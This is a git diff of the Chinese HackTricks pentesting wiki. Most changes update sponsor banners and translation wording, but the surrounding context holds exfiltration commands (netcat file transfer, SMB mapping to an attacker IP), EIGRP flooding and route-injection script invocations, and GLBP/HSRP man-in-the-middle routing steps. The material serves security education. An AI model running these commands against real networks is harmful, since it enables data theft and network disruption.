- -- **Reg**: Command-line utility for working with the registry. - -- **Schtasks**: Command-line tool for managing scheduled tasks. - -- **Bitsadmin**: Command-line tool for managing Background Intelligent Transfer Service (BITS) jobs. - -- **Vssadmin**: Command-line tool for managing Volume Shadow Copy Service. - -- **Wevtutil**: Command-line tool for managing event logs. - -- **Forfiles**: Command-line tool for batch processing files. - -- **Robocopy**: Command-line tool for copying files and directories. - -- **Diskshadow**: Command-line tool for managing shadow copies. - -- **Net**: Command-line tool for managing network resources. - -- **Tasklist**: Command-line tool for listing running processes. - -- **Taskkill**: Command-line tool for terminating processes. - -- **Regsvr32**: Command-line tool for registering and unregistering DLLs. - -- **Regini**: Command-line tool for modifying registry permissions. - -- **Regsvcs**: Command-line tool for registering and unregistering .NET components. - -- **Regsvr32**: Command-line tool for registering and unregistering DLLs. - -- **Regsvr32**: Command-line tool for registering and unregistering DLLs. +Exfiltration can be a critical phase of an attack as it allows threat actors to steal valuable information from a target organization. Detection and prevention of exfiltration attempts are essential for maintaining the security of a system. ```bash CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials @@ -277,7 +224,7 @@ sudo apt-get install sshfs sudo mkdir /mnt/sshfs sudo sshfs -o allow_other,default_permissions @:/ /mnt/sshfs/ ``` -## 网络通信 +## 网络通道 ```bash nc -lvnp 4444 > new_file nc -vn 4444 < exfil_file @@ -318,7 +265,7 @@ sniff(iface="tun0", prn=process_packet) ``` ## **SMTP** -如果您可以将数据发送到SMTP服务器,您可以使用Python创建一个SMTP来接收数据: +如果您可以将数据发送到一个SMTP服务器,您可以使用Python创建一个SMTP来接收数据: ```bash sudo python -m smtpd -n -c DebuggingServer :25 ``` @@ -350,7 +297,19 @@ echo " python -m SimpleHTTPServer 80 ``` @@ -404,16 +363,17 @@ wine exe2bat.exe nc.exe nc.txt {% embed url="https://discord.gg/tryhardsecurity" %} +{% hint style="success" %} +学习和实践AWS黑客技术:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP黑客技术:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)! +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
+{% endhint %} diff --git a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md index bbd0e03ed..6f3b57a4f 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md +++ b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md @@ -1,31 +1,32 @@ # Github Dorks & 泄漏 +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} \ -**漏洞赏金提示**:**注册**Intigriti,这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金! +**赏金提示**:**注册** Intigriti,一个由黑客创建的高级**赏金平台**!今天加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金! {% embed url="https://go.intigriti.com/hacktricks" %} -现在我们已经建立了我们范围内资产的列表,是时候搜索一些OSINT低 hanging fruits 了。 +现在我们已经建立了我们范围内资产的列表,是时候搜索一些 OSINT 低 hanging fruits 了。 ### 已经搜索泄漏的平台 * [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/) -### Github中的API密钥泄漏 +### Github 中的 API 密钥泄漏 * [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog) * [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks) @@ -321,16 +322,17 @@ GCP SECRET AWS SECRET "private" extension:pgp ``` +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 发现我们的独家[**NFTs**]收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index 03fa30e20..14894bbdf 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md @@ -1,18 +1,19 @@ # 广泛源代码搜索 +{% hint style="success" %} +学习并实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} **Try Hard Security Group** @@ -22,18 +23,18 @@ *** -本页面的目标是列举允许在一个或多个平台上搜索代码(文字或正则表达式)的**平台**。 +本页面的目标是列举**允许在数千/数百万个仓库中搜索代码**(文字或正则表达式)的平台。 -这在多种情况下有助于搜索**泄漏信息**或**漏洞**模式。 +这有助于在多种情况下搜索**泄漏信息**或**漏洞**模式。 * [**SourceGraph**](https://sourcegraph.com/search): 在数百万个仓库中搜索。有免费版本和企业版本(15天免费)。支持正则表达式。 -* [**Github搜索**](https://github.com/search): 在Github上搜索。支持正则表达式。 -* 也许还有必要检查[**Github代码搜索**](https://cs.github.com/)。 -* [**Gitlab高级搜索**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): 在Gitlab项目中搜索。支持正则表达式。 +* [**Github Search**](https://github.com/search): 在 Github 中搜索。支持正则表达式。 +* 也许还有必要检查 [**Github Code Search**](https://cs.github.com/)。 +* [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): 在 Gitlab 项目中搜索。支持正则表达式。 * [**SearchCode**](https://searchcode.com/): 在数百万个项目中搜索代码。 {% hint style="warning" %} -当您在一个仓库中寻找泄漏并运行类似`git log -p`的命令时,不要忘记可能存在**其他分支和其他提交**包含机密信息! +当您在仓库中寻找泄漏并运行类似 `git log -p` 的命令时,不要忘记可能存在**包含机密信息的其他分支和其他提交**! {% endhint %} **Try Hard Security Group** @@ -42,16 +43,17 @@ {% embed url="https://discord.gg/tryhardsecurity" %} +{% hint style="success" %} +学习并实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md index 3a6747d73..ed76c9c58 100644 --- a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md +++ b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -### DHCPv6与DHCPv4消息类型比较 -下表展示了DHCPv6和DHCPv4消息类型的比较: +### DHCPv6 vs. DHCPv4 消息类型比较 +下表展示了 DHCPv6 和 DHCPv4 消息类型的比较: -| DHCPv6消息类型 | DHCPv4消息类型 | +| DHCPv6 消息类型 | DHCPv4 消息类型 | |:-------------------|:-------------------| | Solicit (1) | DHCPDISCOVER | | Advertise (2) | DHCPOFFER | @@ -28,19 +29,19 @@ | Reconfigure (10) | DHCPFORCERENEW | | Relay-Forw (12), Relay-Reply (13) | 无 | -**DHCPv6消息类型详细解释:** +**DHCPv6 消息类型详细解释:** -1. **Solicit (1)**: DHCPv6客户端发起以查找可用服务器。 -2. **Advertise (2)**: 服务器响应Solicit发送Advertise,指示提供DHCP服务。 -3. **Request (3)**: 客户端使用此消息从特定服务器请求IP地址或前缀。 +1. **Solicit (1)**: DHCPv6 客户端发起以查找可用服务器。 +2. **Advertise (2)**: 服务器响应 Solicit 发送 Advertise,表示提供 DHCP 服务。 +3. **Request (3)**: 客户端使用此消息从特定服务器请求 IP 地址或前缀。 4. **Confirm (4)**: 客户端用于验证分配的地址在网络上是否仍然有效,通常在网络更改后使用。 5. **Renew (5)**: 客户端向原始服务器发送此消息以延长地址生命周期或更新配置。 -6. **Rebind (6)**: 发送到任何服务器以延长地址生命周期或更新配置,特别是在未收到Renew的响应时。 -7. **Reply (7)**: 服务器使用此消息提供地址、配置参数,或确认Release或Decline等消息。 +6. **Rebind (6)**: 发送到任何服务器以延长地址生命周期或更新配置,特别是在 Renew 未收到响应时。 +7. **Reply (7)**: 服务器使用此消息提供地址、配置参数,或确认 Release 或 Decline 等消息。 8. **Release (8)**: 客户端通知服务器停止使用一个或多个分配的地址。 9. **Decline (9)**: 客户端发送此消息报告分配的地址在网络上存在冲突。 10. **Reconfigure (10)**: 服务器提示客户端启动新的或更新配置的事务。 -11. **Information-Request (11)**: 客户端请求配置参数而不分配IP地址。 +11. **Information-Request (11)**: 客户端请求配置参数而不分配 IP 地址。 12. **Relay-Forw (12)**: 中继代理将消息转发到服务器。 13. **Relay-Repl (13)**: 服务器回复中继代理,然后将消息传递给客户端。 @@ -48,16 +49,17 @@ * [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages) +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index d640e4ad5..f9af269c6 100644 --- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -1,24 +1,25 @@ # EIGRP 攻击 +{% hint style="success" %} +学习并练习 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家) +支持 HackTricks -支持 HackTricks 的其他方式: - -* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com) -* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上**关注我们。 -* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。 +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -**这是** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **中公开的攻击摘要。请查看以获取更多信息。** +**这是** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **中公开的攻击摘要。查看以获取更多信息。** ## **伪造 EIGRP 邻居攻击** -- **目标**:通过向路由器发送大量 EIGRP hello 数据包来使路由器 CPU 过载,可能导致拒绝服务(DoS)攻击。 +- **目标**:通过向路由器发送大量 EIGRP hello 数据包来使路由器 CPU 过载,可能导致拒绝服务 (DoS) 攻击。 - **工具**:**helloflooding.py** 脚本。 - **执行**: ```bash @@ -31,7 +32,7 @@ ## **EIGRP 黑洞攻击** -- **目标**:通过注入虚假路由来破坏网络流量流向,导致流量被定向到不存在的目的地的黑洞。 +- **目标**:通过注入虚假路由来干扰网络流量,导致流量被定向到不存在的目的地的黑洞。 - **工具**:**routeinject.py** 脚本。 - **执行**: ```bash @@ -46,7 +47,7 @@ ## **滥用 K-Values 攻击** -- **目标**:通过注入修改后的 K-Values,在 EIGRP 域内创建持续的中断和重新连接,有效地导致 DoS 攻击。 +- **目标**:通过注入修改后的 K-Values 在 EIGRP 域内创建持续的中断和重新连接,有效地导致 DoS 攻击。 - **工具**:**relationshipnightmare.py** 脚本。 - **执行**: ```bash @@ -69,3 +70,19 @@ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 - `--interface`:指定网络接口。 - `--as`:定义 EIGRP AS 号。 - `--src`:设置攻击者的 IP 地址。 + + +{% hint style="success" %} +学习并练习 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +支持 HackTricks + +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md index 915987f8c..75448cc07 100644 --- a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md @@ -1,18 +1,19 @@ # GLBP & HSRP 攻击 +{% hint style="success" %} +学习并练习 AWS 黑客技能:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技能:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家) +支持 HackTricks -支持 HackTricks 的其他方式: - -* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com) -* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或**关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。 +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
@@ -20,14 +21,14 @@ ## FHRP 劫持概述 -### FHRP 概览 +### FHRP 洞察 FHRP 旨在通过将多个路由器合并为单个虚拟单元来提供网络鲁棒性,从而增强负载分配和容错能力。思科系统推出了该套件中的重要协议,如 GLBP 和 HSRP。 -### GLBP 协议概述 -思科的创造,GLBP,在 TCP/IP 协议栈上运行,利用端口 3222 上的 UDP 进行通信。GLBP 组中的路由器每隔 3 秒交换一次“hello”数据包。如果路由器在 10 秒内未发送这些数据包,则被视为离线。但是,这些计时器不是固定的,可以进行修改。 +### GLBP 协议洞察 +思科的创造,GLBP,在 TCP/IP 协议栈上运行,利用 UDP 在端口 3222 上进行通信。GLBP 组中的路由器每隔 3 秒交换一次“hello”数据包。如果路由器在 10 秒内未发送这些数据包,则被视为离线。但是,这些计时器不是固定的,可以进行修改。 ### GLBP 操作和负载分配 -GLBP 通过使用单个虚拟 IP 和多个虚拟 MAC 地址实现跨路由器的负载分配。在 GLBP 组中,每个路由器都参与数据包转发。与 HSRP/VRRP 不同,GLBP 通过几种机制提供真正的负载平衡: +GLBP 通过使用单个虚拟 IP 和多个虚拟 MAC 地址在路由器之间实现负载分配。在 GLBP 组中,每个路由器都参与数据包转发。与 HSRP/VRRP 不同,GLBP 通过几种机制提供真正的负载平衡: - **主机相关负载平衡:** 为主机保持一致的 AVF MAC 地址分配,对于稳定的 NAT 配置至关重要。 - **轮询负载平衡:** 默认方法,在请求主机之间交替分配 AVF MAC 地址。 @@ -54,8 +55,8 @@ GLBP 通过使用单个虚拟 IP 和多个虚拟 MAC 地址实现跨路由器的 3. 生成一个恶意的 Gratuitous ARP。 4. 注入一个恶意的 GLBP 数据包,冒充 AVG。 5. 为攻击者的网络接口分配一个次要 IP 地址,镜像 GLBP 虚拟 IP。 -6. 实施 SNAT 以完全可见流量。 -7. 调整路由以确保通过原始 AVG 路由器继续访问互联网。 +6. 实施 SNAT 以实现完整的流量可见性。 +7. 调整路由以确保通过原始 AVG 路由器持续访问互联网。 通过遵循这些步骤,攻击者将自己定位为“中间人”,能够拦截和分析网络流量,包括未加密或敏感数据。 @@ -73,11 +74,9 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo route del default sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 ``` -### 使用net-creds.py或类似工具来捕获和分析流经受损网络的数据,可以监视和拦截流量。 - ### HSRP劫持的被动解释及命令详细信息 -#### HSRP概述(热备份路由器/冗余协议) +#### HSRP(热备份路由器/冗余协议)概述 HSRP是思科专有协议,旨在实现网络网关冗余。它允许将多个物理路由器配置为单个逻辑单元,共享一个IP地址。这个逻辑单元由主路由器管理,负责流量导向。与GLBP不同,GLBP使用优先级和权重等指标进行负载平衡,HSRP依赖单个活动路由器进行流量管理。 #### HSRP中的角色和术语 diff --git a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md index c5d5d413f..abd40f32a 100644 --- a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md +++ b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md @@ -1,71 +1,73 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
